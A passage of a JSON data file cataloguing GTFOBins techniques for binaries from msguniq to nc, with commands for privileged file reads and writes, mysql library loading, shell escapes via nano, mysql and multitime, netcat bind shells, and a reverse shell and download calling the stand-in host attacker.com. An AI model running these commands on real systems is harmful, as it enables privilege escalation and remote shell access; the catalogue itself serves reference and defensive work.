macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msguniq:file-read:0:suid","toolId":"gtfo:msguniq","toolName":"msguniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msguniq -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msguniq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msguniq:file-read:0:unprivileged","toolId":"gtfo:msguniq","toolName":"msguniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msguniq -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msguniq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mtr:file-read:0:sudo","toolId":"gtfo:mtr","toolName":"mtr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mtr --raw -F /path/to/input-file","description":"The file is actually parsed, thus the content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mtr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mtr:file-read:0:unprivileged","toolId":"gtfo:mtr","toolName":"mtr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mtr --raw -F /path/to/input-file","description":"The file is actually parsed, thus the content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mtr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:multitime:shell:0:sudo","toolId":"gtfo:multitime","toolName":"multitime","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"multitime /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/multitime/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:multitime:shell:0:suid","toolId":"gtfo:multitime","toolName":"multitime","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"multitime /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/multitime/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:multitime:shell:0:unprivileged","toolId":"gtfo:multitime","toolName":"multitime","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"multitime /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/multitime/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mutt:file-read:0:sudo","toolId":"gtfo:mutt","toolName":"mutt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mutt -F /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mutt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mutt:file-read:0:unprivileged","toolId":"gtfo:mutt","toolName":"mutt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mutt -F /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mutt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mv:file-write:0:sudo","toolId":"gtfo:mv","toolName":"mv","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nmv /path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mv:file-write:0:suid","toolId":"gtfo:mv","toolName":"mv","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nmv /path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mv:file-write:0:unprivileged","toolId":"gtfo:mv","toolName":"mv","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nmv /path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mv:privilege-escalation:0:sudo","toolId":"gtfo:mv","toolName":"mv","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"mv /path/to/input-file /path/to/output-file","description":"This can be used to move and then read or write files from a restricted file systems or with elevated privileges.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mv:privilege-escalation:0:suid","toolId":"gtfo:mv","toolName":"mv","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"mv /path/to/input-file /path/to/output-file","description":"This can be used to move and then read or write files from a restricted file systems or with elevated privileges.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mypy:file-read:0:sudo","toolId":"gtfo:mypy","toolName":"mypy","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mypy /path/to/input-file","description":"Partial content is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mypy/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mypy:file-read:0:unprivileged","toolId":"gtfo:mypy","toolName":"mypy","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mypy /path/to/input-file","description":"Partial content is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mypy/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mypy:file-write:0:sudo","toolId":"gtfo:mypy","toolName":"mypy","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"mypy /path/to/input-file --junit-xml /path/to/output-file","description":"Partial content is leaked as error messages inside some XML tags.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mypy/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mypy:file-write:0:unprivileged","toolId":"gtfo:mypy","toolName":"mypy","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"mypy /path/to/input-file --junit-xml /path/to/output-file","description":"Partial content is leaked as error messages inside some XML tags.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mypy/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mysql:library-load:0:sudo","toolId":"gtfo:mysql","toolName":"mysql","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"mysql --default-auth ../../../../../path/to/lib","description":"The following loads the `/path/to/lib.so` shared object.","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mysql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mysql:library-load:0:suid","toolId":"gtfo:mysql","toolName":"mysql","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"mysql --default-auth ../../../../../path/to/lib","description":"The following loads the `/path/to/lib.so` shared object.","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mysql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mysql:library-load:0:unprivileged","toolId":"gtfo:mysql","toolName":"mysql","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"mysql --default-auth ../../../../../path/to/lib","description":"The following loads the `/path/to/lib.so` shared object.","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mysql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mysql:shell:0:sudo","toolId":"gtfo:mysql","toolName":"mysql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mysql -e '\\! /bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mysql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mysql:shell:0:suid","toolId":"gtfo:mysql","toolName":"mysql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mysql -e '\\! /bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mysql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mysql:shell:0:unprivileged","toolId":"gtfo:mysql","toolName":"mysql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mysql -e '\\! /bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mysql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nano:file-read:0:sudo","toolId":"gtfo:nano","toolName":"nano","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nano /path/to/input-file","description":"The file content is displayed in the terminal interface.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:file-read:0:suid","toolId":"gtfo:nano","toolName":"nano","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nano /path/to/input-file","description":"The file content is displayed in the terminal interface.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:file-read:0:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nano /path/to/input-file","description":"The file content is displayed in the terminal interface.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:file-write:0:sudo","toolId":"gtfo:nano","toolName":"nano","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nano /path/to/output-file\nDATA\n^O","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:file-write:0:suid","toolId":"gtfo:nano","toolName":"nano","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nano /path/to/output-file\nDATA\n^O","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:file-write:0:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"nano /path/to/output-file\nDATA\n^O","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:shell:0:sudo","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano\n^R^X\nreset; sh 1>&0 2>&0","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:shell:0:suid","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano\n^R^X\nreset; sh 1>&0 2>&0","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:shell:0:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nano\n^R^X\nreset; sh 1>&0 2>&0","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:shell:1:sudo","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano -s /bin/sh\n/bin/sh\n^T^T","description":"The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:shell:1:suid","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano -s '/bin/sh -p'\n/bin/sh -p\n^T^T","description":"The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:shell:1:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nano -s /bin/sh\n/bin/sh\n^T^T","description":"The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nasm:file-read:0:sudo","toolId":"gtfo:nasm","toolName":"nasm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nasm -@ /path/to/input-file","description":"The file content is treated as command line options and disclosed throught error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nasm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nasm:file-read:0:suid","toolId":"gtfo:nasm","toolName":"nasm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nasm -@ /path/to/input-file","description":"The file content is treated as command line options and disclosed throught error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nasm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nasm:file-read:0:unprivileged","toolId":"gtfo:nasm","toolName":"nasm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nasm -@ /path/to/input-file","description":"The file content is treated as command line options and disclosed throught error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nasm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:bind-shell:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"nc -l -p 12345 -e /bin/sh","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:bind-shell:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"nc -l -p 12345 -e /bin/sh","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:bind-shell:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"nc -l -p 12345 -e /bin/sh","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:download:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc -l -p 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:download:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc -l -p 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:download:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"nc -l -p 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:download:1:sudo","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc attacker.com 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:download:1:suid","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc attacker.com 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:download:1:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"nc attacker.com 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:reverse-shell:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"nc -e /bin/sh attacker.com 12345","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:reverse-shell:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"nc -e /bin/sh attacker.com 12345","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:reverse-shell:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"nc -e /bin/sh attacker.com 12345","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:upload:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc -l -p 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:upload:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc -l -p 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:upload:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"nc -l -p 12345 </path/to/input-file","description":"The file is actually read by the invoking 